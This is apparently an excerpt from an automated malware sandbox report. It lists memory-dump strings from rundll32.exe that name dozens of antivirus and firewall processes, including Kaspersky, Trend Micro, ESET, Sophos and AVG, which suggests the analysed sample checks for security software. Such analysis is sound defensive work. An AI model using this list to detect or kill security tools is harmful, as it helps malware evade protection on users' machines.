    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVKWCtl.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPWIN.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: KAVStart.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RAVMOND.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsgk32st.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f-prot.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SavService.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RavTask.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163887034.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBA32LDR.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935290329.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF016B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237881300.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPSCHD.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CLPSLS.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012065404.0000025BF012E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714628317.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ONLINENT.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FPAVServer.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xcommsvr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PsImSvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: capfasem.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSGK32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OP_MON.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pavbckpt.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: TMPROXY.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A2START.EXE
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CFP.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: webproxy.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GDFirewallTray.exe
    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KAVPFW.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32kui.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGUI.EXE
